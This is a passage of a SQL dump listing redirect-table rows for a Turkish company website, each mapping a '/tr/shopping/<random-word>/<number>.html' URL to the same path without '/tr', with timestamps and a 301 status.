00:00:00',301),(78359,'https://3s-technologies.com.tr/tr/shopping/orbitosphenoid/4249610269.html',NULL,'https://3s-technologies.com.tr/shopping/orbitosphenoid/4249610269.html','',1,0,'2026-06-11 11:02:39','0000-00-00 00:00:00',301),(78360,'https://3s-technologies.com.tr/tr/shopping/craziness/3925274060.html',NULL,'https://3s-technologies.com.tr/shopping/craziness/3925274060.html','',1,0,'2026-06-11 11:02:42','0000-00-00 00:00:00',301),(78361,'https://3s-technologies.com.tr/tr/shopping/uncoif/890980011.html',NULL,'https://3s-technologies.com.tr/shopping/uncoif/890980011.html','',1,0,'2026-06-11 11:02:45','0000-00-00 00:00:00',301),(78362,'https://3s-technologies.com.tr/tr/shopping/buckhounds/1049076729.html',NULL,'https://3s-technologies.com.tr/shopping/buckhounds/1049076729.html','',1,0,'2026-06-11 11:02:48','0000-00-00 00:00:00',301),(78363,'https://3s-technologies.com.tr/tr/shopping/irremoval/1381371001.html',NULL,'https://3s-technologies.com.tr/shopping/irremoval/1381371001.html','',1,0,'2026-06-11 11:02:51','0000-00-00 00:00:00',301),(78364,'https://3s-technologies.com.tr/tr/shopping/moundbird/840430275.html',NULL,'https://3s-technologies.com.tr/shopping/moundbird/840430275.html','',1,0,'2026-06-11 11:02:55','0000-00-00 00:00:00',301),(78365,'https://3s-technologies.com.tr/tr/shopping/doomsman/85091933.html',NULL,'https://3s-technologies.com.tr/shopping/doomsman/85091933.html','',1,0,'2026-06-11 11:02:58','0000-00-00 00:00:00',301),(78366,'https://3s-technologies.com.tr/tr/shopping/dipadomys/2262887077.html',NULL,'https://3s-technologies.com.tr/shopping/dipadomys/2262887077.html','',1,0,'2026-06-11 11:03:00','0000-00-00 00:00:00',301),(78367,'https://3s-technologies.com.tr/tr/shopping/restringent/2056102023.html',NULL,'https://3s-technologies.com.tr/shopping/restringent/2056102023.html','',1,0,'2026-06-11 11:03:04','0000-00-00 00:00:00',301),(78368,'https://3s-technologies.com.tr/tr/shopping/dudeen/3088759466.html',NULL,'https://3s-technologies.com.tr/shopping/dudeen/3088759466.html','',1,0,'2026-06-11 11:03:07','0000-00-00 00:00:00',301),(78369,'https://3s-technologies.com.tr/tr/shopping/tantalize/3038449140.html',NULL,'https://3s-technologies.com.tr/shopping/tantalize/3038449140.html','',1,0,'2026-06-11 11:03:10','0000-00-00 00:00:00',301),(78370,'https://3s-technologies.com.tr/tr/shopping/orthodoxastical/3807540058.html',NULL,'https://3s-technologies.com.tr/shopping/orthodoxastical/3807540058.html','',1,0,'2026-06-11 11:03:12','0000-00-00 00:00:00',301),(78371,'https://3s-technologies.com.tr/tr/shopping/smeary/3622936818.html',NULL,'https://3s-technologies.com.tr/shopping/smeary/3622936818.html','',1,0,'2026-06-11 11:03:16','0000-00-00 00:00:00',301),(78372,'https://3s-technologies.com.tr/tr/shopping/tupaiid/4067480489.html',NULL,'https://3s-technologies.com.tr/shopping/tupaiid/4067480489.html','',1,0,'2026-06-11 11:03:18','0000-00-00 00:00:00',301),(78373,'https://3s-technologies.com.tr/tr/shopping/euchre/3444566563.html',NULL,'https://3s-technologies.com.tr/shopping/euchre/3444566563.html','',1,0,'2026-06-11 11:03:21','0000-00-00 00:00:00',301),(78374,'https://3s-technologies.com.tr/tr/shopping/mission/713318225.html',NULL,'https://3s-technologies.com.tr/shopping/mission/713318225.html','',1,0,'2026-06-11 11:03:24','0000-00-00 00:00:00',301),(78375,'https://3s-technologies.com.tr/tr/shopping/empetrum/3383196383.html',NULL,'https://3s-technologies.com.tr/shopping/empetrum/3383196383.html','',1,0,'2026-06-11 11:03:28','0000-00-00 00:00:00',301),(78376,'https://3s-technologies.com.tr/tr/shopping/sophimore/346522059.html',NULL,'https://3s-technologies.com.tr/shopping/sophimore/346522059.html','',1,0,'2026-06-11 11:03:31','0000-00-00 00:00:00',301),(78377,'https://3s-technologies.com.tr/tr/shopping/encephalartos/1398461892.html',NULL,'https://3s-technologies.com.tr/shopping/encephalartos/1398461892.html','',1,0,'2026-06-11 11:03:33','0000-00-00 00:00:00',301),(78378,'https://3s-technologies.com.tr/tr/shopping/photodrome/1197828679.html',NULL,'https://3s-technologies.com.tr/shopping/photodrome/1197828679.html','',1,0,'2026-06-11 11:03:37','0000-00-00 00:00:00',301),(78379,'https://3s-technologies.com.tr/tr/shopping/crabbish/2447349250.html',NULL,'https://3s-technologies.com.tr/shopping/crabbish/2447349250.html','',1,0,'2026-06-11 11:03:39','0000-00-00 00:00:00',301),(78380,'https://3s-technologies.com.tr/tr/shopping/booklet/1189838493.html',NULL,'https://3s-technologies.com.tr/shopping/booklet/1189838493.html','',1,0,'2026-06-11 11:03:42','0000-00-00 00:00:00',301),(78381,'https://3s-technologies.com.tr/tr/shopping/xenogenesis/939176380.html',NULL,'https://3s-technologies.com.tr/shopping/xenogenesis/939176380.html','',1,0,'2026-06-11 11:03:49','0000-00-00 00:00:00',301),(78382,'https://3s-technologies.com.tr/tr/shopping/gastrotrocha/4083370778.html',NULL,'https://3s-technologies.com.tr/shopping/gastrotrocha/4083370778.html','',1,0,'2026-06-11 11:03:53','0000-00-00 00:00:00',301),(78383,'https://3s-technologies.com.tr/tr/shopping/coalsey/386545505.html',NULL,'https://3s-technologies.com.tr/shopping/coalsey/386545505.html','',1,0,'2026-06-11 11:03:56','0000-00-00 00:00:00',301),(78384,'https://3s-technologies.com.tr/tr/shopping/hallucinogen/592864646.html',NULL,'https://3s-technologies.com.tr/shopping/hallucinogen/592864646.html','',1,0,'2026-06-11 11:03:59','0000-00-00 00:00:00',301),(78385,'https://3s-technologies.com.tr/tr/shopping/repleviable/551326796.html',NULL,'https://3s-technologies.com.tr/shopping/repleviable/551326796.html','',1,0,'2026-06-11 11:04:02','0000-00-00 00:00:00',301),(78386,'https://3s-technologies.com.tr/tr/shopping/miller/2262369087.html',NULL,'https://3s-technologies.com.tr/shopping/miller/2262369087.html','',1,0,'2026-06-11 11:04:05','0000-00-00 00:00:00',301),(78387,'https://3s-technologies.com.tr/tr/shopping/incubator/1610605845.html',NULL,'https://3s-technologies.com.tr/shopping/incubator/1610605845.html','',1,0,'2026-06-11 11:04:08','0000-00-00 00:00:00',301),(78388,'https://3s-technologies.com.tr/tr/shopping/animalcules/4131748966.html',NULL,'https://3s-technologies.com.tr/shopping/animalcules/4131748966.html','',1,0,'2026-06-11 11:04:11','0000-00-00 00:00:00',301),(78389,'https://3s-technologies.com.tr/tr/shopping/mutans/1942361173.html',NULL,'https://3s-technologies.com.tr/shopping/mutans/1942361173.html','',1,0,'2026-06-11 11:04:14','0000-00-00 00:00:00',301),(78390,'https://3s-technologies.com.tr/tr/shopping/barbulata/2678331982.html',NULL,'https://3s-technologies.com.tr/shopping/barbulata/2678331982.html','',1,0,'2026-06-11 11:04:17','0000-00-00 00:00:00',301),(78391,'https://3s-technologies.com.tr/tr/shopping/unweld/550632703.html',NULL,'https://3s-technologies.com.tr/shopping/unweld/550632703.html','',1,0,'2026-06-11 11:04:20','0000-00-00 00:00:00',301),(78392,'https://3s-technologies.com.tr/tr/shopping/veneer/3920950089.html',NULL,'https://3s-technologies.com.tr/shopping/veneer/3920950089.html','',1,0,'2026-06-11 11:04:23','0000-00-00 00:00:00',301),(78393,'https://3s-technologies.com.tr/tr/shopping/strawberryleaf/3953919118.html',NULL,'https://3s-technologies.com.tr/shopping/strawberryleaf/3953919118.html','',1,0,'2026-06-11 11:04:26','0000-00-00 00:00:00',301),(78394,'https://3s-technologies.com.tr/tr/shopping/unwieldiness/2590632356.html',NULL,'https://3s-technologies.com.tr/shopping/unwieldiness/2590632356.html','',1,0,'2026-06-11 11:04:29','0000-00-00 00:00:00',301),(78395,'https://3s-technologies.com.tr/tr/shopping/lenocinant/1982025597.html',NULL,'https://3s-technologies.com.tr/shopping/lenocinant/1982025597.html','',1,0,'2026-06-11 11:04:32','0000-00-00 00:00:00',301),(78396,'https://3s-technologies.com.tr/tr/shopping/hominal/2992741381.html',NULL,'https://3s-technologies.com.tr/shopping/hominal/2992741381.html','',1,0,'2026-06-11 11:04:36','0000-00-00 00:00:00',301),(78397,'https://3s-technologies.com.tr/tr/shopping/favillous/2762214789.html',NULL,'https://3s-technologies.com.tr/shopping/favillous/2762214789.html','',1,0,'2026-06-11 11:04:38','0000-00-00 00:00:00',301),(78398,'https://3s-technologies.com.tr/tr/shopping/reichsrath/3316567396.html',NULL,'https://3s-technologies.com.tr/shopping/reichsrath/3316567396.html','',1,0,'2026-06-11 11:04:41','0000-00-00 00:00:00',301),(78399,'https://3s-technologies.com.tr/tr/shopping/altiloquence/1095807718.html',NULL,'https://3s-technologies.com.tr/shopping/altiloquence/1095807718.html','',1,0,'2026-06-11 11:04:44','0000-00-00 00:00:00',301),(78400,'https://3s-technologies.com.tr/tr/shopping/boohoe/2951343798.html',NULL,'https://3s-technologies.com.tr/shopping/boohoe/2951343798.html','',1,0,'2026-06-11 11:04:47','0000-00-00 00:00:00',301),(78401,'https://3s-technologies.com.tr/tr/shopping/censurer/1770538740.html',NULL,'https://3s-technologies.com.tr/shopping/censurer/1770538740.html','',1,0,'2026-06-11 11:04:50','0000-00-00 00:00:00',301),(78402,'https://3s-technologies.com.tr/tr/shopping/erianthus/1573560682.html',NULL,'https://3s-technologies.com.tr/shopping/erianthus/1573560682.html','',1,0,'2026-06-11 11:04:53','0000-00-00 00:00:00',301),(78403,'https://3s-technologies.com.tr/tr/shopping/cicindelidae/6226913.html',NULL,'https://3s-technologies.com.tr/shopping/cicindelidae/6226913.html','',1,0,'2026-06-11 11:04:56','0000-00-00 00:00:00',301),(78404,'https://3s-technologies.com.tr/tr/shopping/sympathizer/2610618152.html',NULL,'https://3s-technologies.com.tr/shopping/sympathizer/2610618152.html','',1,0,'2026-06-11 11:04:59','0000-00-00 00:00:00',301),(78405,'https://3s-technologies.com.tr/tr/shopping/sterre/1440907337.html',NULL,'https://3s-technologies.com.tr/shopping/sterre/1440907337.html','',1,0,'2026-06-11 11:05:02','0000-00-00 00:00:00',301),(78406,'https://3s-technologies.com.tr/tr/shopping/decumary/4143159780.html',NULL,'https://3s-technologies.com.tr/shopping/decumary/4143159780.html','',1,0,'2026-06-11 11:05:05','0000-00-00 00:00:00',301),(78407,'https://3s-technologies.com.tr/tr/shopping/lengthen/1907142200.html',NULL,'https://3s-technologies.com.tr/shopping/lengthen/1907142200.html','',1,0,'2026-06-11 11:05:08','0000-00-00 00:00:00',301),(78408,'https://3s-technologies.com.tr/tr/shopping/deltoides/2649662183.html',NULL,'https://3s-technologies.com.tr/shopping/deltoides/2649662183.html','',1,0,'2026-06-11 11:05:11','0000-00-00 00:00:00',301),(78409,'https://3s-technologies.com.tr/tr/shopping/vauntmure/2551434100.html',NULL,'https://3s-technologies.com.tr/shopping/vauntmure/2551434100.html','',1,0,'2026-06-11 11:05:14','0000-00-00 00:00:00',301),(78410,'https://3s-technologies.com.tr/tr/shopping/pileatus/3585987740.html',NULL,'https://3s-technologies.com.tr/shopping/pileatus/3585987740.html','',1,0,'2026-06-11 11:05:17','0000-00-00 00:00:00',301),(78411,'https://3s-technologies.com.tr/tr/shopping/cayugas/1944785387.html',NULL,'https://3s-technologies.com.tr/shopping/cayugas/1944785387.html','',1,0,'2026-06-11 11:05:20','0000-00-00 00:00:00',301),(78412,'https://3s-technologies.com.tr/tr/shopping/verrucous/4233731461.html',NULL,'https://3s-technologies.com.tr/shopping/verrucous/4233731461.html','',1,0,'2026-06-11 11:05:23','0000-00-00 00:00:00',301),(78413,'https://3s-technologies.com.tr/tr/shopping/curtailed/3796684555.html',NULL,'https://3s-technologies.com.tr/shopping/curtailed/3796684555.html','',1,0,'2026-06-11 11:05:26','0000-00-00 00:00:00',301),(78414,'https://3s-technologies.com.tr/tr/shopping/tunefully/227236672.html',NULL,'https://3s-technologies.com.tr/shopping/tunefully/227236672.html','',1,0,'2026-06-11 11:05:29','0000-00-00 00:00:00',301),(78415,'https://3s-technologies.com.tr/tr/shopping/autographal/3011653876.html',NULL,'https://3s-technologies.com.tr/shopping/autographal/3011653876.html','',1,0,'2026-06-11 11:05:33','0000-00-00 00:00:00',301),(78416,'https://3s-technologies.com.tr/tr/shopping/adamance/1699839003.html',NULL,'https://3s-technologies.com.tr/shopping/adamance/1699839003.html','',1,0,'2026-06-11 11:05:35','0000-00-00 00:00:00',301),(78417,'https://3s-technologies.com.tr/tr/shopping/fencible/4211435335.html',NULL,'https://3s-technologies.com.tr/shopping/fencible/4211435335.html','',1,0,'2026-06-11 11:05:38','0000-00-00 00:00:00',301),(78418,'https://3s-technologies.com.tr/tr/shopping/sludy/2794248049.html',NULL,'https://3s-technologies.com.tr/shopping/sludy/2794248049.html','',1,0,'2026-06-11 11:05:41','0000-00-00 00:00:00',301),(78419,'https://3s-technologies.com.tr/tr/shopping/twotongued/3362553767.html',NULL,'https://3s-technologies.com.tr/shopping/twotongued/3362553767.html','',1,0,'2026-06-11 11:05:44','0000-00-00 00:00:00',301),(78420,'https://3s-technologies.com.tr/tr/shopping/inocarpin/443085074.html',NULL,'https://3s-technologies.com.tr/shopping/inocarpin/443085074.html','',1,0,'2026-06-11 11:05:48','0000-00-00 00:00:00',301),(78421,'https://3s-technologies.com.tr/tr/shopping/tigrine/1467249023.html',NULL,'https://3s-technologies.com.tr/shopping/tigrine/1467249023.html','',1,0,'2026-06-11 11:06:02','0000-00-00 00:00:00',301),(78422,'https://3s-technologies.com.tr/tr/shopping/hymeniums/2709438773.html',NULL,'https://3s-technologies.com.tr/shopping/hymeniums/2709438773.html','',1,0,'2026-06-11 11:07:36','0000-00-00 00:00:00',301),(78423,'https://3s-technologies.com.tr/tr/shopping/antibrachial/1834018249.html',NULL,'https://3s-technologies.com.tr/shopping/antibrachial/1834018249.html','',1,0,'2026-06-11 11:07:41','0000-00-00 00:00:00',301),(78424,'https://3s-technologies.com.tr/tr/shopping/daydream/4225161034.html',NULL,'https://3s-technologies.com.tr/shopping/daydream/4225161034.html','',1,0,'2026-06-11 11:07:46','0000-00-00 00:00:00',301),(78425,'https://3s-technologies.com.tr/tr/shopping/aeglefinus/3069632771.html',NULL,'https://3s-technologies.com.tr/shopping/aeglefinus/3069632771.html','',1,0,'2026-06-11 11:07:53','0000-00-00 00:00:00',301),(78426,'https://3s-technologies.com.tr/tr/shopping/folkmote/3818539238.html',NULL,'https://3s-technologies.com.tr/shopping/folkmote/3818539238.html','',1,0,'2026-06-11 11:07:56','0000-00-00 00:00:00',301),(78427,'https://3s-technologies.com.tr/tr/shopping/sleeveless/927411083.html',NULL,'https://3s-technologies.com.tr/shopping/sleeveless/927411083.html','',1,0,'2026-06-11 11:08:01','0000-00-00 00:00:00',301),(78428,'https://3s-technologies.com.tr/tr/shopping/unessentially/1637721888.html',NULL,'https://3s-technologies.com.tr/shopping/unessentially/1637721888.html','',1,0,'2026-06-11 11:08:06','0000-00-00 00:00:00',301),(78429,'https://3s-technologies.com.tr/tr/shopping/disseminate/2827468138.html',NULL,'https://3s-technologies.com.tr/shopping/disseminate/2827468138.html','',1,0,'2026-06-11 11:08:11','0000-00-00 00:00:00',301),(78430,'https://3s-technologies.com.tr/tr/shopping/furzechuck/4288326725.html',NULL,'https://3s-technologies.com.tr/shopping/furzechuck/4288326725.html','',1,0,'2026-06-11 11:08:16','0000-00-00 00:00:00',301),(78431,'https://3s-technologies.com.tr/tr/shopping/frostiness/3176802078.html',NULL,'https://3s-technologies.com.tr/shopping/frostiness/3176802078.html','',1,0,'2026-06-11 11:08:21','0000-00-00 00:00:00',301),(78432,'https://3s-technologies.com.tr/tr/shopping/alleys/245967332.html',NULL,'https://3s-technologies.com.tr/shopping/alleys/245967332.html','',1,0,'2026-06-11 11:08:28','0000-00-00 00:00:00',301),(78433,'https://3s-technologies.com.tr/tr/shopping/pontifical/3990400137.html',NULL,'https://3s-technologies.com.tr/shopping/pontifical/3990400137.html','',1,0,'2026-06-11 11:08:32','0000-00-00 00:00:00',301),(78434,'https://3s-technologies.com.tr/tr/shopping/guinean/1142021316.html',NULL,'https://3s-technologies.com.tr/shopping/guinean/1142021316.html','',1,0,'2026-06-11 11:08:37','0000-00-00 00:00:00',301),(78435,'https://3s-technologies.com.tr/tr/shopping/frondiferous/2321133875.html',NULL,'https://3s-technologies.com.tr/shopping/frondiferous/2321133875.html','',1,0,'2026-06-11 11:08:42','0000-00-00 00:00:00',301),(78436,'https://3s-technologies.com.tr/tr/shopping/palatonares/3609108241.html',NULL,'https://3s-technologies.com.tr/shopping/palatonares/3609108241.html','',1,0,'2026-06-11 11:08:47','0000-00-00 00:00:00',301),(78437,'https://3s-technologies.com.tr/tr/shopping/atrocious/3202346761.html',NULL,'https://3s-technologies.com.tr/shopping/atrocious/3202346761.html','',1,0,'2026-06-11 11:08:52','0000-00-00 00:00:00',301),(78438,'https://3s-technologies.com.tr/tr/shopping/cydonia/1562572999.html',NULL,'https://3s-technologies.com.tr/shopping/cydonia/1562572999.html','',1,0,'2026-06-11 11:08:57','0000-00-00 00:00:00',301),(78439,'https://3s-technologies.com.tr/tr/shopping/unclasp/1387335411.html',NULL,'https://3s-technologies.com.tr/shopping/unclasp/1387335411.html','',1,0,'2026-06-11 11:09:06','0000-00-00 00:00:00',301),(78440,'https://3s-technologies.com.tr/tr/shopping/reigle/3547093988.html',NULL,'https://3s-technologies.com.tr/shopping/reigle/3547093988.html','',1,0,'2026-06-11 11:09:08','0000-00-00 00:00:00',301),(78441,'https://3s-technologies.com.tr/tr/shopping/bahai/1223274283.html',NULL,'https://3s-technologies.com.tr/shopping/bahai/1223274283.html','',1,0,'2026-06-11 11:09:13','0000-00-00 00:00:00',301),(78442,'https://3s-technologies.com.tr/tr/shopping/antilyssic/4206248555.html',NULL,'https://3s-technologies.com.tr/shopping/antilyssic/4206248555.html','',1,0,'2026-06-11 11:09:18','0000-00-00 00:00:00',301),(78443,'https://3s-technologies.com.tr/tr/shopping/couchancy/3620349081.html',NULL,'https://3s-technologies.com.tr/shopping/couchancy/3620349081.html','',1,0,'2026-06-11 11:09:23','0000-00-00 00:00:00',301),(78444,'https://3s-technologies.com.tr/tr/shopping/piasaba/2516000943.html',NULL,'https://3s-technologies.com.tr/shopping/piasaba/2516000943.html','',1,0,'2026-06-11 11:09:28','0000-00-00 00:00:00',301),(78445,'https://3s-technologies.com.tr/tr/shopping/somonour/1245381648.html',NULL,'https://3s-technologies.com.tr/shopping/somonour/1245381648.html','',1,0,'2026-06-11 11:09:33','0000-00-00 00:00:00',301),(78446,'https://3s-technologies.com.tr/tr/shopping/watusi/426942103.html',NULL,'https://3s-technologies.com.tr/shopping/watusi/426942103.html','',1,0,'2026-06-11 11:09:38','0000-00-00 00:00:00',301),(78447,'https://3s-technologies.com.tr/tr/shopping/umbelliferone/156146153.html',NULL,'https://3s-technologies.com.tr/shopping/umbelliferone/156146153.html','',1,0,'2026-06-11 11:09:43','0000-00-00 00:00:00',301),(78448,'https://3s-technologies.com.tr/tr/shopping/rakery/441872975.html',NULL,'https://3s-technologies.com.tr/shopping/rakery/441872975.html','',1,0,'2026-06-11 11:09:48','0000-00-00 00:00:00',301),(78449,'https://3s-technologies.com.tr/tr/shopping/miners/1421831319.html',NULL,'https://3s-technologies.com.tr/shopping/miners/1421831319.html','',1,0,'2026-06-11 11:09:53','0000-00-00 00:00:00',301),(78450,'https://3s-technologies.com.tr/tr/shopping/tarsi/750401854.html',NULL,'https://3s-technologies.com.tr/shopping/tarsi/750401854.html','',1,0,'2026-06-11 11:09:58','0000-00-00 00:00:00',301),(78451,'https://3s-technologies.com.tr/tr/shopping/gotten/2536680524.html',NULL,'https://3s-technologies.com.tr/shopping/gotten/2536680524.html','',1,0,'2026-06-11 11:10:03','0000-00-00 00:00:00',301),(78452,'https://3s-technologies.com.tr/tr/shopping/muricate/506311410.html',NULL,'https://3s-technologies.com.tr/shopping/muricate/506311410.html','',1,0,'2026-06-11 11:10:08','0000-00-00 00:00:00',301),(78453,'https://3s-technologies.com.tr/tr/shopping/imbrutement/191624750.html',NULL,'https://3s-technologies.com.tr/shopping/imbrutement/191624750.html','',1,0,'2026-06-11 11:10:16','0000-00-00 00:00:00',301),(78454,'https://3s-technologies.com.tr/tr/shopping/overanxiety/931999871.html',NULL,'https://3s-technologies.com.tr/shopping/overanxiety/931999871.html','',1,0,'2026-06-11 11:10:20','0000-00-00 00:00:00',301),(78455,'https://3s-technologies.com.tr/tr/shopping/paraphrased/4013719617.html',NULL,'https://3s-technologies.com.tr/shopping/paraphrased/4013719617.html','',1,0,'2026-06-11 11:10:25','0000-00-00 00:00:00',301),(78456,'https://3s-technologies.com.tr/tr/shopping/ricinine/3062456262.html',NULL,'https://3s-technologies.com.tr/shopping/ricinine/3062456262.html','',1,0,'2026-06-11 11:10:31','0000-00-00 00:00:00',301),(78457,'https://3s-technologies.com.tr/tr/shopping/bibliophilism/857532663.html',NULL,'https://3s-technologies.com.tr/shopping/bibliophilism/857532663.html','',1,0,'2026-06-11 11:10:35','0000-00-00 00:00:00',301),(78458,'https://3s-technologies.com.tr/tr/shopping/creepiness/2284437986.html',NULL,'https://3s-technologies.com.tr/shopping/creepiness/2284437986.html','',1,0,'2026-06-11 11:10:40','0000-00-00 00:00:00',301),(78459,'https://3s-technologies.com.tr/tr/shopping/dacninae/1171487025.html',NULL,'https://3s-technologies.com.tr/shopping/dacninae/1171487025.html','',1,0,'2026-06-11 11:10:45','0000-00-00 00:00:00',301),(78460,'https://3s-technologies.com.tr/tr/shopping/cinematograph/908498588.html',NULL,'https://3s-technologies.com.tr/shopping/cinematograph/908498588.html','',1,0,'2026-06-11 11:10:50','0000-00-00 00:00:00',301),(78461,'https://3s-technologies.com.tr/tr/shopping/tajacu/3889629757.html',NULL,'https://3s-technologies.com.tr/shopping/tajacu/3889629757.html','',1,0,'2026-06-11 11:10:55','0000-00-00 00:00:00',301),(78462,'https://3s-technologies.com.tr/tr/shopping/pruinosus/999486442.html',NULL,'https://3s-technologies.com.tr/shopping/pruinosus/999486442.html','',1,0,'2026-06-11 11:11:00','0000-00-00 00:00:00',301),(78463,'https://3s-technologies.com.tr/tr/shopping/seafarer/813136130.html',NULL,'https://3s-technologies.com.tr/shopping/seafarer/813136130.html','',1,0,'2026-06-11 11:11:05','0000-00-00 00:00:00',301),(78464,'https://3s-technologies.com.tr/tr/shopping/vaccaria/1832902251.html',NULL,'https://3s-technologies.com.tr/shopping/vaccaria/1832902251.html','',1,0,'2026-06-11 11:11:10','0000-00-00 00:00:00',301),(78465,'https://3s-technologies.com.tr/tr/shopping/boxwood/2483947513.html',NULL,'https://3s-technologies.com.tr/shopping/boxwood/2483947513.html','',1,0,'2026-06-11 11:11:15','0000-00-00 00:00:00',301),(78466,'https://3s-technologies.com.tr/tr/shopping/liliidae/618182994.html',NULL,'https://3s-technologies.com.tr/shopping/liliidae/618182994.html','',1,0,'2026-06-11 11:11:20','0000-00-00 00:00:00',301),(78467,'https://3s-technologies.com.tr/tr/shopping/bucketing/1615173080.html',NULL,'https://3s-technologies.com.tr/shopping/bucketing/1615173080.html','',1,0,'2026-06-11 11:11:26','0000-00-00 00:00:00',301),(78468,'https://3s-technologies.com.tr/tr/shopping/epizootic/2902194938.html',NULL,'https://3s-technologies.com.tr/shopping/epizootic/2902194938.html','',1,0,'2026-06-11 11:11:30','0000-00-00 00:00:00',301),(78469,'https://3s-technologies.com.tr/tr/shopping/sensoria/3942629098.html',NULL,'https://3s-technologies.com.tr/shopping/sensoria/3942629098.html','',1,0,'2026-06-11 11:11:35','0000-00-00 00:00:00',301),(78470,'https://3s-technologies.com.tr/tr/shopping/neoterism/2238451615.html',NULL,'https://3s-technologies.com.tr/shopping/neoterism/2238451615.html','',1,0,'2026-06-11 11:11:40','0000-00-00 00:00:00',301),(78471,'https://3s-technologies.com.tr/tr/shopping/cracovian/2550222017.html',NULL,'https://3s-technologies.com.tr/shopping/cracovian/2550222017.html','',1,0,'2026-06-11 11:11:45','0000-00-00 00:00:00',301),(78472,'https://3s-technologies.com.tr/tr/shopping/conchyliaceous/672298365.html',NULL,'https://3s-technologies.com.tr/shopping/conchyliaceous/672298365.html','',1,0,'2026-06-11 11:11:50','0000-00-00 00:00:00',301),(78473,'https://3s-technologies.com.tr/tr/shopping/hoarfrost/1222062168.html',NULL,'https://3s-technologies.com.tr/shopping/hoarfrost/1222062168.html','',1,0,'2026-06-11 11:11:56','0000-00-00 00:00:00',301),(78474,'https://3s-technologies.com.tr/tr/shopping/grammatoptila/1488105823.html',NULL,'https://3s-technologies.com.tr/shopping/grammatoptila/1488105823.html','',1,0,'2026-06-11 11:12:00','0000-00-00 00:00:00',301),(78475,'https://3s-technologies.com.tr/tr/shopping/stegosauria/730066130.html',NULL,'https://3s-technologies.com.tr/shopping/stegosauria/730066130.html','',1,0,'2026-06-11 11:12:05','0000-00-00 00:00:00',301),(78476,'https://3s-technologies.com.tr/tr/shopping/autocarpous/2718568742.html',NULL,'https://3s-technologies.com.tr/shopping/autocarpous/2718568742.html','',1,0,'2026-06-11 11:12:10','0000-00-00 00:00:00',301),(78477,'https://3s-technologies.com.tr/tr/shopping/introit/1910682428.html',NULL,'https://3s-technologies.com.tr/shopping/introit/1910682428.html','',1,0,'2026-06-11 11:12:15','0000-00-00 00:00:00',301),(78478,'https://3s-technologies.com.tr/tr/shopping/neuralgia/3854410784.html',NULL,'https://3s-technologies.com.tr/shopping/neuralgia/3854410784.html','',1,0,'2026-06-11 11:12:20','0000-00-00 00:00:00',301),(78479,'https://3s-technologies.com.tr/tr/shopping/paleontographical/3941416999.html',NULL,'https://3s-technologies.com.tr/shopping/paleontographical/3941416999.html','',1,0,'2026-06-11 11:12:25','0000-00-00 00:00:00',301),(78480,'https://3s-technologies.com.tr/tr/shopping/inductoriums/1659992760.html',NULL,'https://3s-technologies.com.tr/shopping/inductoriums/1659992760.html','',1,0,'2026-06-11 11:12:30','0000-00-00 00:00:00',301),(78481,'https://3s-technologies.com.tr/tr/shopping/dispauperize/1139251792.html',NULL,'https://3s-technologies.com.tr/shopping/dispauperize/1139251792.html','',1,0,'2026-06-11 11:12:35','0000-00-00 00:00:00',301),(78482,'https://3s-technologies.com.tr/tr/shopping/zoocytia/77317400.html',NULL,'https://3s-technologies.com.tr/shopping/zoocytia/77317400.html','',1,0,'2026-06-11 11:12:40','0000-00-00 00:00:00',301),(78483,'https://3s-technologies.com.tr/tr/shopping/mechoacan/3352140852.html',NULL,'https://3s-technologies.com.tr/shopping/mechoacan/3352140852.html','',1,0,'2026-06-11 11:12:45','0000-00-00 00:00:00',301),(78484,'https://3s-technologies.com.tr/tr/shopping/artillerist/3255124868.html',NULL,'https://3s-technologies.com.tr/shopping/artillerist/3255124868.html','',1,0,'2026-06-11 11:12:50','0000-00-00 00:00:00',301),(78485,'https://3s-technologies.com.tr/tr/shopping/azotous/2142130324.html',NULL,'https://3s-technologies.com.tr/shopping/azotous/2142130324.html','',1,0,'2026-06-11 11:12:55','0000-00-00 00:00:00',301),(78486,'https://3s-technologies.com.tr/tr/shopping/podura/2554810789.html',NULL,'https://3s-technologies.com.tr/shopping/podura/2554810789.html','',1,0,'2026-06-11 11:13:00','0000-00-00 00:00:00',301),(78487,'https://3s-technologies.com.tr/tr/shopping/signaturist/763513446.html',NULL,'https://3s-technologies.com.tr/shopping/signaturist/763513446.html','',1,0,'2026-06-11 11:13:07','0000-00-00 00:00:00',301),(78488,'https://3s-technologies.com.tr/tr/shopping/rubiginose/3893220630.html',NULL,'https://3s-technologies.com.tr/shopping/rubiginose/3893220630.html','',1,0,'2026-06-11 11:13:12','0000-00-00 00:00:00',301),(78489,'https://3s-technologies.com.tr/tr/shopping/machiner/1527750061.html',NULL,'https://3s-technologies.com.tr/shopping/machiner/1527750061.html','',1,0,'2026-06-11 11:13:17','0000-00-00 00:00:00',301),(78490,'https://3s-technologies.com.tr/tr/shopping/inadvertence/167863843.html',NULL,'https://3s-technologies.com.tr/shopping/inadvertence/167863843.html','',1,0,'2026-06-11 11:13:22','0000-00-00 00:00:00',301),(78491,'https://3s-technologies.com.tr/tr/shopping/expensefulness/1050288844.html',NULL,'https://3s-technologies.com.tr/shopping/expensefulness/1050288844.html','',1,0,'2026-06-11 11:13:27','0000-00-00 00:00:00',301),(78492,'https://3s-technologies.com.tr/tr/shopping/siker/1797030721.html',NULL,'https://3s-technologies.com.tr/shopping/siker/1797030721.html','',1,0,'2026-06-11 11:13:32','0000-00-00 00:00:00',301),(78493,'https://3s-technologies.com.tr/tr/shopping/warsaw/2119581548.html',NULL,'https://3s-technologies.com.tr/shopping/warsaw/2119581548.html','',1,0,'2026-06-11 11:13:37','0000-00-00 00:00:00',301),(78494,'https://3s-technologies.com.tr/tr/shopping/labiodental/1856125630.html',NULL,'https://3s-technologies.com.tr/shopping/labiodental/1856125630.html','',1,0,'2026-06-11 11:13:42','0000-00-00 00:00:00',301),(78495,'https://3s-technologies.com.tr/tr/shopping/culverhouse/3717742788.html',NULL,'https://3s-technologies.com.tr/shopping/culverhouse/3717742788.html','',1,0,'2026-06-11 11:13:48','0000-00-00 00:00:00',301),(78496,'https://3s-technologies.com.tr/tr/shopping/sesquibasic/3863540753.html',NULL,'https://3s-technologies.com.tr/shopping/sesquibasic/3863540753.html','',1,0,'2026-06-11 11:13:52','0000-00-00 00:00:00',301),(78497,'https://3s-technologies.com.tr/tr/shopping/guadalcanal/815300720.html',NULL,'https://3s-technologies.com.tr/shopping/guadalcanal/815300720.html','',1,0,'2026-06-11 11:13:57','0000-00-00 00:00:00',301),(78498,'https://3s-technologies.com.tr/tr/shopping/unmeet/2283225887.html',NULL,'https://3s-technologies.com.tr/shopping/unmeet/2283225887.html','',1,0,'2026-06-11 11:14:02','0000-00-00 